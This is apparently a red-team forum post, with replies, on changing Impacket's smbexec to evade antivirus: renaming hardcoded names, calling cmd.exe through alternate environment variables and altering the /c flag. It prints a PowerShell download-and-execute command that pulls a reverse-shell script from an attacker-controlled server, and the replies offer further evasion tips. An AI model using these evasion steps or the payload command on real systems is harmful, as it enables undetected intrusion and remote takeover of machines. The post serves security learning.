A Dive on SMBEXEC

One of the things that makes a good red teamer is to understand our tools. I noticed recently how these tools are being looked at and I demonstrate a little on what we can do about these well known attacks.

We all know the glorious Impacket tools, very well known in the Cybersecurity Community and hackers among us. Today I will take a look at the Impacket tools. I was recently surprised by how these tools get detected and why are they found while Threat Hunting, I also wanted to understand on why it was happening. And while searching I was mind blown, probably old to some people but damn I wanted to write about it.

I will work with SMBEXEC on this talk.

Now let’s check a little the SMBEXEC code. One of the first things that stand out to me is some BAT files and output files that seems to be written onto the target machine when executed.

Let’s run the tool and see what happens out of the box to take a better look at what is going on with this tool.

As expected

But, why?. Let’s take a look at what happened.

Oh, so I’s a command line that is getting detected, it does seem to be strange that an Administrator Account tries to Write a bat file onto the Temp Folder, Execute it and then remove it. Right?.

Now let’s take a look at the part of Impacket that gets detected and find this piece of code. We are well aware that we have a section of the code where it’s creating the execute.bat file

Now I changed the code and found some “synonyms” of each of the words that were hardcoded onto the tool, I had no idea what BTO meant so I chose a more “legitimate” service name.

Now let’s try running the tool again. [Remember we still haven’t changed the command, wanted to test if this was enough to bypass] .

Damn it, no luck at all.

Ok, now let’s dig a little deeper on the command line this time.

Ok, let’s see the self._output section, looks for the local drive C$ (Accessible to Administrator) smbexec will choose this by default if no other is selected, will continue to output the BAT file, execute it and then proceed to delete it. But look here, it seems to be calling cmd.exe using an environment variable for all this to run. Let us take a quick look at our variables for Windows.

Aaaah so there we go, cmd.exe now, in what other ways can we call cmd.exe?, Directly with other variables?. Let’s go down a little further.

Here are some interesting ones, %SystemDrive%, %SystemRoot%, %windir%. Great we have 3 options to have our way and execute cmd.exe, let’s try these for our tool smbexec.

Ok, so I edited it for it to call cmd.exe in a different manner I will use 1 variable and add the other part of the path to reach cmd.exe

Let’s see what happens:

Damn it’s still getting caught, let’s dive a little more, so what other thing can get detected besides our different variables that are used, oh your thinking the same right?. Exactly the parameters, very smart. But which one is it? /Q or /c maybe both???. Let’s not take a risk and do something about that.

Now let’s understand what happens when we use these parameters we want to focus on /Q, /c. So if we check the help menu from CMD

Ok so /C carries out the command by string and then it terminates it [this is important], if we run smbexec with this here is the result on Process Explorer:

But if we run it with /k carries out the command but remains.

We have a process, and its running as SYSTEM, damn. No output of course, we gain a shell but we leave a process behind.

But, what other alternatives do we have??. Change the Environment variable and add a slight tweak to the /c parameter, I don’t know why but this works just by adding a (,). I tried to understand it but it seems way over my knowledge cmd is very amazing so much we do not know.

[After a while I noticed that the parameter /c was the one being flagged]

Now let’s try it.

Ok nice video if I say so, but now I am thinking, wait you have Code Execution why are you doing all this crazy stuff?. Why not just execute a PowerShell Command and call your obfuscated, super hidden payload instead of leaving traces behind. Well of course you can do that as well!!.

We have out AV up and running:

Now let’s move back to our attacking machine and execute our smbexec with our PowerShell command

I setup a listener, my command running smbexec and a python server to call my shell and receive the connection back to my machine.

Listener:

Python Server:

SMBEXEC:

cmd.exe /Q /c powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.0.2.20:8000/Connectar-Tcp.ps1');

Shell:

Afterwards:

Breaks SMBEXEC

After this simple demonstration I wanted to show how some changes to our tools functionality can have us again connected to the user’s network. We have plenty of possibilities to achieve our goal. We just have to think a little bit out of the Box

You can take a look that the AV was only flagging the /c parameter and probably anything after that, but once a small difference is added we can see that our code gets executed as there are plenty of methods to achieve this, Hmm maybe replacing it with a LOLBIN???. Who knows but it might be out there.

Keep Learning!!

6 Likes

This line reminded me of a powershell adversary tactics course I recently read about.

Overall a very good article. It would be interesting to see this approach scripted to to pick random file names and services rather than relying on static changes until something works.

2 Likes

Absolutely!! This would cut a lot of time!!. I think maybe some scripts are out there, hopefully the article can help newcomers understand their tools and see why Red Teamers or APT take this approach.

i will execute powershell command but IEX is flagged by Windows defender…
try using powershell command CURL to download from link and then run…]
IEX is blocked in powersshell by Windows Defender.

1 Like

Great read! I ran into this problem with WD stoping smbexec.py while I was doing PEH on udemy. I am using smbexec.py in kali to walk through your post. However, to make the changes that you did, I need to edit the smbexec.py script itself correct?

edit: found it! For those having trouble finding the location of the smbexec changes here you go:
If you locate smbexec.py in /bin/ you will see that it points to a script in: /usr/share/doc/python3-impacket/examples/smbexec.py so to make the changes as above just edit that script!

edit2: so i was editing the above script but everytime i would run just smbexec.py which calls impacket it wouldn’t use my updated script. However when i ran the script on its own with python3 smbexec.py from the scripts dir it work fine! it seems that impacket ignored my changes for some reason… weird.

Oh, I grabbed the repository and edited those files not the ones already located on your System just in case I broke something, which I did :rofl:

That work’s usually execution gets flagged and not downloads, you can always obfuscate those Cmdlets or change the aliases

1 Like